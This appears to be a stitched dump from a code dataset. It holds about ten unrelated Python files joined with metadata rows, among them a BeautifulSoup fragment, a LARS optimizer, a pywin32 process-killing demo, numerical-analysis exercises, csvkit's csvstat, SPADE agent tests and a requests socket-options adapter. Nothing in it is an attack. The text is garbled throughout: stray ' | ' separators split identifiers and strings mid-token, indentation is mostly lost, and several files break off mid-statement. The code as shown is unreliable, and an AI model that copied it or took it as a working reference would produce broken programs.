if isinstance(features, basestring):
features = [features]
if features is None or len(features) == 0:
features = self.DEFAULT_BUILDER_FEATURES
builder_class = builder_registry.lookup(*features)
if builder_class is None:
raise Val | ueError(
"Couldn't find a tree builder with the features you "
"requested: %s. Do you need to install a parser library?"
% ",".join(features))
builder = builder_class()
self.builder = builder
self.is_xml = builder.is_xml
self.builder.soup = self
| self.parse_only = parse_only
self.reset()
if hasattr(markup, 'read'): # It's a file-type object.
markup = markup.read()
(self.markup, self.original_encoding, self.declared_html_encoding,
self.contains_replacement_characters) = (
self.builder.prepare_markup(markup, from_encoding))
try:
self._feed()
except StopParsing:
pass
# Clear out the markup and remove the builder's circular
# reference to this object.
self.markup = None
self.builder.soup = None
def _feed(self):
# Convert the document to Unicode.
self.builder.reset()
self.builder.feed(self.markup)
# Close out any unfinished strings and close all the open tags.
self.endData()
while self.currentTag.name != self.ROOT_TAG_NAME:
self.popTag()
def reset(self):
Tag.__init__(self, self, self.builder, self.ROOT_TAG_NAME)
self.hidden = 1
self.builder.reset()
self.currentData = []
self.currentTag = None
self.tagStack = []
self.pushTag(self)
def new_tag(self, name, namespace=None, nsprefix=None, **attrs):
"""Create a new tag associated with this soup."""
return Tag(None, self.builder, name, namespace, nsprefix, attrs)
def new_string(self, s):
"""Create a new NavigableString associated with this soup."""
navigable = NavigableString(s)
navigable.setup()
return navigable
def insert_before(self, successor):
raise ValueError("BeautifulSoup objects don't support insert_before().")
def insert_after(self, successor):
raise ValueError("BeautifulSoup objects don't support insert_after().")
def popTag(self):
tag = self.tagStack.pop()
#print "Pop", tag.name
if self.tagStack:
self.currentTag = self.tagStack[-1]
return self.currentTag
    def pushTag(self, tag):
        #print "Push", tag.name
        if self.currentTag:
            self.currentTag.contents.append(tag)
        self.tagStack.append(tag)
        self.currentTag = self.tagStack[-1]
google/objax | objax/optimizer/lars.py | Python | apache-2.0 | 2,914 | 0.002745 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or ag | reed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# lim | itations under the License.
__all__ = ['LARS']
from typing import List
import jax.numpy as jn
from objax.module import Module, ModuleList
from objax.typing import JaxArray
from objax.util import class_name
from objax.variable import TrainRef, StateVar, TrainVar, VarCollection
class LARS(Module):
"""Layerwise adaptive rate scaling (LARS) optimizer.
See https://arxiv.org/abs/1708.03888
"""
def __init__(self, vc: VarCollection,
momentum: float = 0.9,
weight_decay: float = 1e-4,
tc: float = 1e-3,
eps: float = 1e-5):
"""Constructor for LARS optimizer.
Args:
vc: collection of variables to optimize.
momentum: coefficient used for the moving average of the gradient.
weight_decay: weight decay coefficient.
tc: trust coefficient eta ( < 1) for trust ratio computation.
eps: epsilon used for trust ratio computation.
"""
self.momentum = momentum
self.weight_decay = weight_decay
self.tc = tc
self.eps = eps
self.train_vars = ModuleList(TrainRef(x) for x in vc.subset(TrainVar))
self.m = ModuleList(StateVar(jn.zeros_like(x.value)) for x in self.train_vars)
def __call__(self, lr: float, grads: List[JaxArray]):
"""Updates variables based on LARS algorithm.
Args:
lr: learning rate. The LARS paper suggests using lr = lr_0 * (1 -t/T)**2,
where t is the current epoch number and T the maximum number of epochs.
grads: the gradients to apply.
"""
assert len(grads) == len(self.train_vars), 'Expecting as many gradients as trainable variables'
for g, p, m in zip(grads, self.train_vars, self.m):
p_norm = jn.linalg.norm(p.value)
g_norm = jn.linalg.norm(g)
trust_ratio = self.tc * p_norm / (g_norm + self.weight_decay * p_norm + self.eps)
local_lr = lr * jn.maximum(jn.logical_or(p_norm == 0, g_norm == 0), trust_ratio)
m.value = self.momentum * m.value + local_lr * (g + self.weight_decay * p.value)
p.value -= m.value
def __repr__(self):
return f'{class_name(self)}(momentum={self.momentum}, weight_decay={self.weight_decay}, ' \
f'tc={self.tc}, eps={self.eps})'
|
JulienMcJay/eclock | windows/Python27/Lib/site-packages/pywin32-218-py2.7-win32.egg/scripts/killProcName.py | Python | gpl-2.0 | 1,766 | 0.026048 | # Kills a process by process name
#
# Uses the Performance Data Helper to locate the PID, then kills it.
# Will only kill the process if there is only one process of that name
# (eg, attempting to kill "Python.exe" will only work if there is only
# one Python.exe running. (Note that the current process does not
# count - ie, if Python.exe is hosting this script, you can still kill
# another Python.exe (as long as there is only one other Python.exe)
# Really just a demo for the win32pdh(util) module, which allows you
# to get all sorts | of information about a running process and many
# other aspects of your system.
import win32api, win32pdhutil, win32con, sys
def killProcName(procname):
# Change suggested by Dan Knierim, who found that this performed a
# "refresh", allowing us to kill processes created since this was run
# for the first time.
try:
win32pdhutil.GetPerformanceAttributes('Process','ID Process',procname)
except:
pass
pids = | win32pdhutil.FindPerformanceAttributesByName(procname)
# If _my_ pid in there, remove it!
try:
pids.remove(win32api.GetCurrentProcessId())
except ValueError:
pass
if len(pids)==0:
result = "Can't find %s" % procname
elif len(pids)>1:
result = "Found too many %s's - pids=`%s`" % (procname,pids)
else:
handle = win32api.OpenProcess(win32con.PROCESS_TERMINATE, 0,pids[0])
win32api.TerminateProcess(handle,0)
win32api.CloseHandle(handle)
result = ""
return result
if __name__ == '__main__':
    if len(sys.argv)>1:
        for procname in sys.argv[1:]:
            result = killProcName(procname)
            if result:
                print result
                print "Dumping all processes..."
                win32pdhutil.ShowAllProcesses()
            else:
                print "Killed %s" % procname
    else:
        print "Usage: killProcName.py procname ..."
|
ilcn/NumericalAnalysis | a3.py | Python | gpl-2.0 | 659 | 0.069803 | def p5a():
xs = [-.75, -0.5,-0.25,0]
fxs = [-.0718125, -.02475, .3349375, 1.101]
getdd123(xs,fxs,3)
def getdd123(xs,fxs,n):
    # Newton divided differences (1st, 2nd and 3rd order)
l1stdd = []
l2nddd = []
l3rddd = []
for i in range | (0,n):
l1stdd.append((fxs[i+1]-fxs[i])/(xs[i+1]-xs[i]))
for i in range(0,n-1):
l2nddd.append((l1stdd[i+1]-l1stdd[i])/(xs[i+2]-xs[i]))
for i in range(0,n-2):
l3rddd.append((l2nddd[i+1]-l2nddd[i])/(xs[i+3]-xs[i]))
#print [l1stdd,l2nddd,l3rddd]
return [l1stdd,l2nddd,l3rddd]
def p7a():
xs = [-.1, 0,.2,.3]
fxs = [5.3, 2, 3.19, 1]
getdd123(xs,fxs,3)
def p14():
xs = [0, .25,.5,.75]
fxs = [1, 2, 3.5, 6]
getdd123(xs,fxs, | 3)
|
alex/djangobench | djangobench/benchmarks/query_latest/benchmark.py | Python | bsd-3-clause | 241 | 0.016598 | from djangobench.utils import run_benchmark
from query_latest.models import Book
def benchmark():
Book.objects.latest()
run_benchmark(
benchmark,
meta = | {
'description': 'A si | mple Model.objects.latest() call.',
}
)
|
MTgeophysics/mtpy | legacy/csvutm.py | Python | gpl-3.0 | 3,718 | 0.000807 | #!/usr/bin/env python
'''Convert and add columns for different coordinate systems to a CSV file.
This script requires pyproj installed. If you have a CSV file with two columns
containing x and y coordinates in some coordinate system (the "from" system),
this script will add another two columns with the coordinates transformed into
another system (the "to" system). The CSV file must have a header row, and
the column names should be specified on the command line as well.
The coordinate systems are defined by their EPSG codes. Geographic coordinates
(decimal degrees) on the WGS-84 datum are code 4326. There is a code for
every system imaginable: see a searchable list at
http://spatialreference.org/ref/epsg/
'''
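# A hypothetical invocation (file names are placeholders) using the defaults
# set up in get_parser() below -- WGS-84 lon/lat in, GDA94 / MGA zone 53 out:
#
#   python csvutm.py sites_wgs84.csv sites_mga53.csv
#
# which appends 'easting' and 'northing' columns computed from 'lon'/'lat'.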
# Standard library packages
import argparse
import sys
try:
import cStringIO as StringIO
except ImportError:
import StringIO
# Third-party packages
import csv
import pyproj
def main():
parser = get_parser()
args = parser.parse_args(sys.argv[1:])
with open(args.in_csv_filename[0], mode='r') as f:
csv_txt = f.read()
out_file = open(args.out_csv_filename[0], mode='wb')
csvutm(csv_txt, out_file, delimiter=args.delimiter,
f=args.from_coords, fx=args.fx, fy=args.fy,
t=args.to, tx=args.tx, ty=args.ty)
def csvutm(csvtxt, out_file, delimiter=',',
f='28353', fx='easting', fy='northing',
        t='4326', tx='lon', ty='lat'):
"""
    Transform the fx/fy coordinate columns in csvtxt from EPSG code f to
    EPSG code t, append them as columns tx/ty, and write to out_file.
"""
f_in = StringIO.StringIO(csvtxt)
r = csv.DictReader(f_in, delimiter=delimiter)
for key in (fx, fy):
try:
assert key in r.fieldnames
except AssertionError:
print('Did not find %s in CSV file.' % key)
raise
fxs = []
fys = []
for i, row in enumerate(r):
fxs.append(float(row[fx]))
fys.append(float(row[fy]))
p1 = pyproj.Proj(init='epsg:%s' % f)
p2 = pyproj.Proj(init='epsg:%s' % t)
txs, tys = pyproj.transform(p1, p2, fxs, fys)
f_in.seek(0)
r = csv.DictReader(f_in, delimiter=delimiter)
fnames = r. | fieldnames
if tx not in fnames:
fnames += [tx]
if ty not in fnames:
fnames += [ty]
w = csv.DictWriter(out_file, fieldnames=fnames, delimiter=delimiter)
w.writeheader()
for i, row in enumerate(r):
row[tx] = txs[i]
row[ty] = tys[i]
w.writerow(row)
def get_parser():
"""
    Build the command-line argument parser for this script.
"""
parser = argparse.ArgumentParser(description=__d | oc__.split('\n')[0],
epilog=__doc__, formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'--fx',
default='lon',
help='column header for x coord of 1st (from) coord system')
parser.add_argument(
'--fy',
default='lat',
help='column header for y coord of 1st (from) coord system')
parser.add_argument(
'--tx',
default='easting',
help='column header for x coord of 2nd (to) coord system')
parser.add_argument(
'--ty',
default='northing',
help='column header for y coord of 2nd (to) coord system')
parser.add_argument('-f', '--from', help='EPSG code for coordinate system to convert from.\n'
'See http://spatialreference.org/ref/epsg/', default='4326', dest='from_coords')
parser.add_argument(
'-t',
'--to',
help='EPSG code for coordinate system to convert into.',
default='28353')
parser.add_argument('-d', '--delimiter', default=',')
parser.add_argument('in_csv_filename', nargs=1)
parser.add_argument('out_csv_filename', nargs=1)
return parser
if __name__ == '__main__':
main()
|
exic/spade2 | examples/unittests/dadTestCase.py | Python | lgpl-2.1 | 14,968 | 0.012427 | import os
import sys
import time
import unittest
sys.path.append('../..')
import spade
import xmpp
import xml.dom.minidom
def CreateSD(s=""):
sd = spade.DF.ServiceDescription()
sd.setName("servicename1"+s)
sd.setType("type1"+s)
sd.addProtocol("sdprotocol1"+s)
sd.addOntologies("sdontology1"+s)
sd.addLanguage("sdlanguage1"+s)
sd.setOwnership("agent1"+s)
sd.addProperty("P","valueP"+s)
sd.addProperty("Q","valueQ"+s)
return sd
def CreateDAD(s=""):
dad = spade.DF.DfAgentDescription()
aid = spade.AID.aid()
aid.setName("aidname"+s)
dad.setAID(aid)
dad.addProtocol("protocol1"+s)
dad.addOntologies("ontology1"+s)
dad.addLanguage("language1"+s)
dad.setLeaseTime(1000)
dad.addScope("scope1"+s)
return dad
def CreateCO(s=""):
co = spade.content.ContentObject()
co["name"] = spade.AID.aid(name="aidname"+s).asContentObject()
co["lease-time"] = 1000
co["protocols"] = ["protocol1"+s,"sdprotocol1"+s]
co["ontologies"] = ["ontology1"+s,"sdontology1"+s]
co["languages"] = ["language1"+s, "sdlanguage1"+s]
co["scope"] = "scope1"+s
sdco = spade.content.ContentObject()
sdco["name"] = "servicename1"+s
sdco["type"] = "type1"+s
sdco["protocols"] = ["sdprotocol1"+s]
sdco["languages"] = ["sdlanguage1"+s]
sdco["ontologies"] = ["sdontology1"+s]
sdco["ownership"] = "agent1"+s
sdco["properties"] = spade.content.ContentObject()
sdco["properties"]["P"] = "valueP"+s
sdco["properties"]["Q"] = "valueQ"+s
co["services"] = [sdco]
return co
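# CreateCO presumably mirrors CreateDAD + CreateSD field for field, so a
# DfAgentDescription can be checked against its ContentObject encoding.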
class DadTestCase(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def testCreateDad(self):
dad = spade.DF.DfAgentDescription()
self.assertEqual(dad.getName(),spade.AID.aid())
self.assertEqual(dad.getServices(),[])
self.assertEqual(dad.getProtocols(),[])
self.assertEqual(dad.getOntologies(),[])
self.assertEqual(dad.getLanguages(),[])
self.assertEqual(dad.getLeaseTime(),None)
self.assertEqual(dad.getScope(),[])
aid = spade.AID.aid()
aid.setName("aidname")
dad.setAID(aid)
self.assertEqual(dad.getName(),"aidname")
dad.addProtocol("protocol1")
self.assertEqual(dad.getProtocols(),["protocol1"])
dad.addOntologies("ontology1")
self.assertEqual(dad.getOntologies(),["ontology1"])
dad.addLanguage("language1")
self.assertEqual(dad.getLanguages(), ["language1"])
dad.setLeaseTime(1000)
self.assertEqual(dad.getLeaseTime(),1000)
dad.addScope("scope1")
self.assertEqual(dad.getScope(),"scope1")
def testAddService(self):
dad = CreateDAD()
sd1 = CreateSD("a")
sd2 = CreateSD("b")
dad.addService(sd1)
self.assertEqual(len(dad.getServices()),1)
self.assertEqual(dad.getServices()[0].getName(),"servicename1a")
self.assertEqual(dad.getProtocols() , ["protocol1","sdprotocol1a"])
self.assertEqual(dad.getLanguages() , ["language1","sdlanguage1a"])
self.assertEqual(dad.getOntologies() , ["ontology1","sdontology1a"])
dad.addService(sd2)
self.assertEqual(len(dad.getServices()),2)
self.failIf(dad.getServices()[0].getName() not in ["servicename1a","servicename1b"])
self.failIf(dad.getServices()[1].getName() not in ["servicename1a","servicename1b"])
self.assertEqual(dad.getProtocols() , ["protocol1","sdprotocol1a","sdprotocol1b"])
self.assertEqual(dad.getLanguages() , ["language1","sdlanguage1a","sdlanguage1b"])
self.assertEqual(dad.getOntologies() , ["ontology1","sdontology1a","sdontology1b"])
def testDelService(self):
dad = CreateDAD()
sd1 = CreateSD("a")
sd2 = CreateSD("b")
dad.addService(sd1)
dad.addService(sd2)
self.assertEqual(len(dad.getServices()),2)
delsd1 = CreateSD("a")
r = dad.delService(delsd1)
self.assertEqual(r,True)
self.assertEqual(len(dad.getServices()),1)
self.failIf(dad.getServices()[0].getName() != "servicename1b")
self.failIf("sdprotocol1a" in dad.getProtocols())
self.failIf("sdlanguage1a" in dad.getLanguages())
self.failIf("sdontology1a" in dad.getOntologies())
delsd2 = CreateSD("b")
dad.delService(delsd2)
self.assertEqual(len(dad.getServices()),0)
self.failIf("sdprotocol1b" in dad.getProtocols())
self.failIf("sdlanguage1b" in dad.getLanguages())
self.failIf("sdontology1b" in dad.getOntologies())
def testUpdateService(self):
dad = CreateDAD()
sd1 = CreateSD("a")
dad.addService(sd1)
sd2 = CreateSD("a")
sd2.setType("updated_type")
r = dad.updateService(sd2)
self.assertEqual(r,True)
self.assertEqual(len(dad.getServices()),1)
self.assertEqual(dad.getServices()[0].getType(),"updated_type")
self.assertEqual(dad.getServices()[0].getName(),"servicename1a")
def testCreateSD(self):
sd = spade.DF.ServiceDescription()
self.assertEqual(sd.getName(),None)
self.assertEqual(sd.getType(),None)
self.assertEqual(sd.getProtocols(),[])
self.assertEqual(sd.getOntologies(),[])
self.assertEqual(sd.getLanguages(),[])
self.assertEqual(sd.getOwnership(),None)
self.assertEqual(sd.getProperties(),{})
sd.setName("servicename1")
self.assertEqual(sd.getName(),"servicename1")
sd.setType("type1")
self.assertEqual(sd.getType(),"type1")
sd.addProtocol("protocol1")
self.assertEqual(sd.getProtocols(),["protocol1"])
sd.addOntologies("ontology1")
self.assertEqual(sd.getOntologies(),["ontology1"])
sd.addLanguage("language1")
self.assertEqual(sd.getLanguages(), ["language1"])
sd.setOwnership("agent1")
self.assertEqual(sd.getOwnership(),"agent1")
sd.addProperty("key1","value1")
self.assertEqual(sd.getProperty("key1"),"value1")
sd.addProperty("key2","value2")
self.assertEqual(sd.getProperty("key2"),"value2")
self.assertEqual(sd.getProperties(),{'key1':'value1','key2':'value2'})
def testMatchSD(self):
sd1 = CreateSD("a")
sd2 = spade.DF.ServiceDescription()
sd2.setName("servicename1a")
self.assertEqual(sd1.match(sd2),True)
sd2.setType("type1a")
self.assertEqual(sd1.match(sd2),True)
sd1.addOntologies("sdontology2a")
sd2.addOntologies("sdontology1a")
self.assertEqual(sd1.match(sd2),True)
sd2.setType("modified_type")
self.assertEqual(sd1.match(sd2),False)
sd2.addOntologies("sdontology3")
self.assertEqual(sd1.match(sd2),False)
def testMatchDAD(self):
dad1 = CreateDAD("a")
dad2 = spade.DF.DfAgentDescription()
aid = spade.AID.aid()
aid.setName("aidnamea")
dad2.setAID(aid)
self.assertEqual(dad1.match(dad2),True)
dad2.addLanguage("language1a")
self.assertEqual(dad1.match(dad2),True)
dad1.addLanguage("language2a")
self.assertEqual(dad1.match(dad2),True)
dad2.addLanguage("language3a")
self.assertEqual(dad1.match(dad2),False)
dad1 = CreateDAD("a")
dad2 = spade.DF.DfAgentDescription()
aid = spade.AID.aid()
aid.setName("aidnamea")
dad2.setAID(aid)
sd1 = CreateSD("a")
dad1.addService(sd1)
dad2.addService(sd1)
self.assertEqual(dad1.match(dad2),True)
sd2 = CreateSD("b")
dad2.addService(sd2)
self.assertEqual(dad1.match(dad2),False)
dad1.addSe | rvice(sd2)
self.assertEqual(dad1.match(dad2),True)
def testXML(self):
xml1='<name><name>aidname1</name></name><lease- | time>1000</l |
rajathkumarmp/robocomp | tools/rcmonitor/examples/laserViewer.py | Python | gpl-3.0 | 3,144 | 0.024491 | # -*- coding: utf-8 -*-
# Copyright (C) 2010 by RoboLab - University of Extremadura
#
# This file is part of RoboComp
#
# RoboComp is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# RoboComp is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with RoboComp. If not, see <http://www.gnu.org/licenses/>.
#
import Ice, sys, math, traceback
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.Qt import *
class C(QWidget):
def __init__(self, endpoint, modules):
QWidget.__init__(self)
self.ic = Ice.initialize(sys.argv)
self.mods = modules
self.prx = self.ic.stringToProxy(endpoint)
self.proxy = self.mods['RoboCompLaser'].LaserPrx.checkedCast(self.prx)
self.show()
self.label = QLabel('pixel/mm ratio', self)
self.label.move(10, 10)
self.label.show()
self.spinBox = QDoubleSpinBox(self)
self.spinBox.show()
self.spinBox.move(10, 10+self.label.height())
self.spinBox.resize(150, 25)
self.spinBox.setMaximum(1024.)
self.spinBox.setMinimum(0.004)
        self.spinBox.setDecimals(6)
self.spinBox.setSingleStep(0.00005)
self.job()
print self.proxy.getLaserConfData()
def job(self):
try:
self.data, basura = self.proxy.getLaserAndBStateData()
print '-----'
m = -1
M = -1
for d in self.data:
if m == -1 or d.dist < m:
m = d.dist
if M == -1 or d.dist > M:
M = d.dist
print len(self.data), ' from', m, 'to', M
except:
print 'No laser connection.'
return None
def measure2coord(self, measure):
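        # Convert one polar laser sample (angle, dist) to widget pixels:
        # rotate by -pi/2 so angle 0 points up the screen, scale mm -> px
        # with the spin-box ratio, then translate to the widget centre.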
const_mul = self.spinBox.value()
x = math.cos(measure.angle-0.5*math.pi)*measure.dist*const_mul+(0.5*self.width())
y = math.sin(measure.angle-0.5*math.pi)*measure.dist*const_mul+(0.5*self.height())
return x, y
def paintEvent(self, event=None):
xOff = self.width()/2.
yOff = self.height()/2.
painter = QPainter(self)
painter.setRenderHint(QPainter.Antialiasing, True)
for point in self.data:
newCoor = self.measure2coord(point)
painter.drawRect(newCoor[0]-1, newCoor[1]-1, 2, | 2)
for wm in range(10):
w = 1000. * (1.+wm) * self.spinBox.value()
painter.drawEllipse(QRectF(0.5*self.width()-w/2., 0.5*self.height()-w/2., w, w))
for wm in range(5):
w = 200. * (1.+wm) * self.spinBox.value()
painter.drawEllipse(QRectF(0.5*self.width()-w/2., 0.5*self.height()-w/2., w, w))
#painter.drawL | ine(QPoint(0.5*self.width(), 0.5*self.height()), QPoint(0.5*self.width(), 0.5*self.height()+20))
#painter.drawLine(QPoint(0.5*self.width(), 0.5*self.height()), QPoint(0.5*self.width()+5, 0.5*self.height()+20))
#painter.drawLine(QPoint(0.5*self.width(), 0.5*self.height()), QPoint(0.5*self.width()-5, 0.5*self.height()+20))
painter.end()
painter = None
|
unpingco/csvkit | csvkit/utilities/csvstat.py | Python | mit | 8,673 | 0.007149 | #!/usr/bin/env python
import datetime
from heapq import nlargest
from operator import itemgetter
import math
import six
from csvkit import CSVKitReader, table
from csvkit.cli import CSVKitUtility
NoneType = type(None)
MAX_UNIQUE = 5
MAX_FREQ = 5
OPERATIONS = ('min', 'max', 'sum', 'mean', 'median', 'stdev', 'nulls', 'unique', 'freq', 'len')
class CSVStat(CSVKitUtility):
description = 'Print descriptive statistics for each column in a CSV file.'
override_flags = ['l']
def add_arguments(self):
self.argparser.add_argument('-y', '--snifflimit', dest='snifflimit', type=int,
help='Limit CSV dialect sniffing to the specified number of bytes. Specify "0" to disable sniffing entirely.')
self.argparser.add_argument('-c', '--columns', dest='columns',
help='A comma separated list of column indices or names to be examined. Defaults to all columns.')
self.argparser.add_argument('--max', dest='max_only', action='store_true',
help='Only output max.')
self.argparser.add_argument('--min', dest='min_only', action='store_true',
help='Only output min.')
self.argparser.add_argument('--sum', dest='sum_only', action='store_true',
help='Only output sum.')
self.argparser.add_argument('--mean', dest='mean_only', action='store_true',
help='Only output mean.')
self.argparser.add_argument('--median', dest='median_only', action='store_true',
help='Only output median.')
self.argparser.add_argument('--stdev', dest='stdev_only', action='store_true',
help='Only output standard deviation.')
self.argparser.add_argument('--nulls', dest='nulls_only', action='store_true',
help='Only output whether column contains nulls.')
self.argparser.add_argument('--unique', dest='unique_only', action='store_true',
help='Only output unique values.')
self.argparser.add_argument('--freq', dest='freq_only', action='store_true',
help='Only output frequent values.')
self.argparser.add_argument('--len', dest='len_only', action='store_true',
help='Only output max value length.')
self.argparser.add_argument('--count', dest='count_only', action='store_true',
help='Only output row count')
def main(self):
operations = [op for op in OPERATIONS if getattr(self.args, op + '_only')]
if len(operations) > 1:
self.argparser.error('Only one statistic argument may be specified (mean, median, etc).')
if operations and self.args.count_only:
self.argparser.error('You may not specify --count and a statistical argument at the same time.')
if self.args.count_only:
count = len(list(CSVKitReader(self.input_file)))
if not self.args.no_header_row:
count -= 1
self.output_file.write('Row count: %i\n' % count)
return
tab = table.Table.from_csv(
self.input_file,
snifflimit=self.args.snifflimit,
column_ids=self.args.columns,
zero_based=self.args.zero_based,
no_header_row=self.args.no_header_row,
**self.reader_kwargs
)
for c in tab:
values = sorted(filter(lambda i: i is not None, c))
stats = {}
# Output a single stat
if len(operations) == 1:
op = operations[0]
stat = getattr(self, 'get_%s' % op)(c, values, {})
# Formatting
if op == 'unique':
stat = len(stat)
elif op == 'freq':
stat = ', '.join([('"%s": %s' % (six.text_type(k), count)) for k, count in stat])
stat = '{ %s }' % stat
if len(tab) == 1:
self.output_file.write(six.text_ty | pe(stat))
else:
sel | f.output_file.write('%3i. %s: %s\n' % (c.order + 1, c.name, stat))
# Output all stats
else:
for op in OPERATIONS:
stats[op] = getattr(self, 'get_%s' % op)(c, values, stats)
self.output_file.write(('%3i. %s\n' % (c.order + 1, c.name)))
if c.type == None:
self.output_file.write('\tEmpty column\n')
continue
self.output_file.write('\t%s\n' % c.type)
self.output_file.write('\tNulls: %s\n' % stats['nulls'])
if len(stats['unique']) <= MAX_UNIQUE and c.type is not bool:
uniques = [six.text_type(u) for u in list(stats['unique'])]
data = u'\tValues: %s\n' % ', '.join(uniques)
self.output_file.write(data)
else:
if c.type not in [six.text_type, bool]:
self.output_file.write('\tMin: %s\n' % stats['min'])
self.output_file.write('\tMax: %s\n' % stats['max'])
if c.type in [int, float]:
self.output_file.write('\tSum: %s\n' % stats['sum'])
self.output_file.write('\tMean: %s\n' % stats['mean'])
self.output_file.write('\tMedian: %s\n' % stats['median'])
self.output_file.write('\tStandard Deviation: %s\n' % stats['stdev'])
self.output_file.write('\tUnique values: %i\n' % len(stats['unique']))
if len(stats['unique']) != len(values):
self.output_file.write('\t%i most frequent values:\n' % MAX_FREQ)
for value, count in stats['freq']:
self.output_file.write(('\t\t%s:\t%s\n' % (six.text_type(value), count)))
if c.type == six.text_type:
self.output_file.write('\tMax length: %i\n' % stats['len'])
if not operations:
self.output_file.write('\n')
self.output_file.write('Row count: %s\n' % tab.count_rows())
def get_min(self, c, values, stats):
if c.type == NoneType:
return None
v = min(values)
        if c.type in [datetime.datetime, datetime.date, datetime.time]:
return v.isoformat()
return v
def get_max(self, c, values, stats):
if c.type == NoneType:
return None
v = max(values)
        if c.type in [datetime.datetime, datetime.date, datetime.time]:
return v.isoformat()
return v
def get_sum(self, c, values, stats):
if c.type not in [int, float]:
return None
return sum(values)
def get_mean(self, c, values, stats):
if c.type not in [int, float]:
return None
if 'sum' not in stats:
stats['sum'] = self.get_sum(c, values, stats)
return float(stats['sum']) / len(values)
def get_median(self, c, values, stats):
if c.type not in [int, float]:
return None
return median(values)
def get_stdev(self, c, values, stats):
if c.type not in [int, float]:
return None
if 'mean' not in stats:
stats['mean'] = self.get_mean(c, values, stats)
return math.sqrt(sum(math.pow(v - stats['mean'], 2) for v in values) / len(values))
def get_nulls(self, c, values, stats):
return c.has_nulls()
def get_unique(self, c, values, stats):
return set(values)
def get_freq(self, c, values, stats):
return freq(values)
def get_len(self, c, values, stats):
if c.type != six.text_type:
return None
return c.max_length()
def median(l):
"""
    Compute the median of a sorted list.
"""
length = len(l)
if length % 2 == 1:
return l[(length + 1) // 2 - 1]
else:
a = l[(length // 2) - 1]
b = l[length // 2]
return (float(a + b)) / 2
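# Quick sanity check for median() above (illustrative only; inputs must
# already be sorted, as they are when called from main()):
#   median([1, 2, 3])     -> 2
#   median([1, 2, 3, 4])  -> 2.5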
def freq(l, n=MAX_FREQ):
    """
    Count the number of times each value occurs in a list; return the
    n most frequent values as (value, count) pairs.
    """
    import collections
    return collections.Counter(l).most_common(n)
catapult-project/catapult | third_party/requests_toolbelt/requests_toolbelt/adapters/socket_options.py | Python | bsd-3-clause | 4,789 | 0 | # -*- coding: utf-8 -*-
"""The implementation of the SocketOptionsAdapter."""
import socket
import warnings
import sys
import requests
from requests import adapters
from .._compat import connection
from .._compat import poolmanager
from .. import exceptions as exc
class SocketOptionsAdapter(adapters.HTTPAdapter):
"""An adapter for requests that allows users to specify socket options.
Since version 2.4.0 of requests, it is possible to specify a custom list
of socket options that need to be set before establishing the connection.
Example usage::
>>> import socket
>>> import requests
>>> from requests_toolbelt.adapters import socket_options
>>> s = requests.Session()
>>> opts = [(socket.IPPROTO_TCP, socket.TCP_NODELAY, 0)]
>>> adapter = socket_options.SocketOptionsAdapter(socket_options=opts)
>>> s.mount('http://', adapter)
You can also take advantage of the list of default options on this class
to keep using the original options in addition to your custom options. In
that case, ``opts`` might look like::
>>> opts = socket_options.SocketOptionsAdapter.default_options + opts
"""
if connection is not None:
default_options = getattr(
connection.HTTPConnection,
'default_socket_options',
[(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)]
)
else:
default_options = []
        warnings.warn(
            "This version of Requests is only compatible with a "
            "version of urllib3 which is too old to support "
            "setting options on a socket. This adapter is "
            "functionally useless.",
            exc.RequestsVersionTooOld,
        )
def __init__(self, **kwargs):
self.socket_options = kwargs.pop('socket_options',
self.default_options)
super(SocketOptionsAdapter, self).__init__(**kwargs)
def init_poolmanager(self, connections, maxsize, block=False):
if requests.__build__ >= 0x020400:
# NOTE(Ian): Perhaps we should raise a warning
self.poolmanager = poolmanager.PoolManager(
num_pools=connections,
maxsize=maxsize,
block=block,
socket_options=self.socket_options
)
else:
super(SocketOptionsAdapter, self).init_poolmanager(
connections, maxsize, block
)
class TCPKeepAliveAdapter(SocketOptionsAdapter):
"""An adapter for requests that turns on TCP Keep-Alive by default.
The adapter sets 4 socket options:
- ``SOL_SOCKET`` ``SO_KEEPALIVE`` - This turns on TCP Keep-Alive
- ``IPPROTO_TCP`` ``TCP_KEEPINTVL`` 20 - Sets the keep alive interval
- ``IPPROTO_TCP`` ``TCP_KEEPCNT`` 5 - Sets the number of keep alive probes
- ``IPPROTO_TCP`` ``TCP_KEEPIDLE`` 60 - Sets the keep alive time if the
socket library has the ``TCP_KEEPIDLE`` constant
The latter three can be overridden by keyword arguments (respectively):
- ``idle``
- ``interval``
- ``count``
You can use this adapter like so::
>>> from requests_toolbelt.adapters import socket_options
>>> tcp = socket_options.TCPKeepAliveAdapter(idle=120, interval=10)
>>> s = requests.Session()
>>> s.mount('http://', tcp)
"""
def __init__(self, **kwargs):
socket_options = kwargs.pop('socket_options',
SocketOptionsAdapter.default_options)
idle = kwargs.pop('idle', 60)
interval = kwargs.pop('interval', 20)
        count = kwargs.pop('count', 5)
socket_options = socket_options + [
(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
]
# NOTE(Ian): OSX does not have these constants defined, so we
        # set them conditionally.
if getattr(socket, 'TCP_KEEPINTVL', None) is not None:
socket_options += [(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL,
interval)]
elif sys.platform == 'darwin':
# On OSX, TCP_KEEPALIVE from netinet/tcp.h is not exported
# by python's socket module
TCP_KEEPALIVE = getattr(socket, 'TCP_KEEPALIVE', 0x10)
socket_options += [(socket.IPPROTO_TCP, TCP_KEEPALIVE, interval)]
if getattr(socket, 'TCP_KEEPCNT', None) is not None:
socket_options += [(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, count)]
if getattr(socket, 'TCP_KEEPIDLE', None) is not None:
